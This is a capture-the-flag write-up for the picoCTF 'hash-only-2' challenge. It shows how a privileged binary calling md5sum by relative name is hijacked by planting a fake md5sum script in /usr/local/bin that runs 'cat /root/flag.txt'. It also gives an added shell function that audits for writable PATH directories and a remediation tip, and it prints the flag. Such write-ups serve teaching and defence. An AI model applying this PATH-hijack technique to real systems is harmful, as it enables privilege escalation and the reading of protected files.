hash-only-2
Description
Here is a binary that has enough privilege to read the content of the flag file but will only let you know its hash. If only it could just give you the actual content!
Initial analysis
We appear to be in a shell other than bash. This restricts us from using I/O redirection and using cd, but we can just run bash.
Now, /usr/bin/md5sum is not writeable. However, we can write somewhere higher in the PATH: /usr/local/bin.
echo '#!/usr/bin/bash' > /usr/local/bin/md5sum
echo 'cat /root/flag.txt' >> /usr/local/bin/md5sum
chmod u+x /usr/local/bin/md5sum
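The condition this relies on, a directory the current user can write to that is searched before the one that really provides md5sum, can be audited for directly. The function below is an added example, not part of the original write-up; the name shadowable_dirs and the temporary demo layout are assumptions made for illustration.

```shell
#!/bin/sh
# Added audit example; not part of the original write-up.
# shadowable_dirs CMD [PATH_STRING]
#   Prints each PATH directory that is searched before the directory CMD
#   resolves from and that the current user can write to.
#   Exit status: 0 if CMD was found, 1 if it is not on the PATH at all.
shadowable_dirs() (
    cmd=$1
    path_str=${2:-$PATH}
    IFS=:      # split PATH on colons (subshell body, caller's IFS untouched)
    set -f     # no glob expansion of PATH elements
    for dir in $path_str; do
        # An empty PATH element means the current directory.
        [ -n "$dir" ] || dir=.
        # This directory provides CMD: later entries can no longer shadow it.
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            exit 0
        fi
        if [ -d "$dir" ] && [ -w "$dir" ]; then
            printf '%s\n' "$dir"
        fi
    done
    exit 1
)

# Constructed demo layout standing in for /usr/local/bin and /usr/bin.
demo=$(mktemp -d)
mkdir "$demo/local_bin" "$demo/bin"
printf '#!/bin/sh\n' > "$demo/bin/md5sum"
chmod +x "$demo/bin/md5sum"
echo "writable directories searched before md5sum:"
shadowable_dirs md5sum "$demo/local_bin:$demo/bin"
rm -rf "$demo"
```

Run it as the unprivileged account, with the PATH the privileged program inherits; any output is a finding. A privileged program avoids the problem by calling its helpers by absolute path or by setting its own PATH before running them.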
Flag
Computing the MD5 hash of /root/flag.txt....
picoCTF{Co-@utH0r_Of_Sy5tem_b!n@riEs_9bde33ed}
This post is licensed under CC BY 4.0 by the author.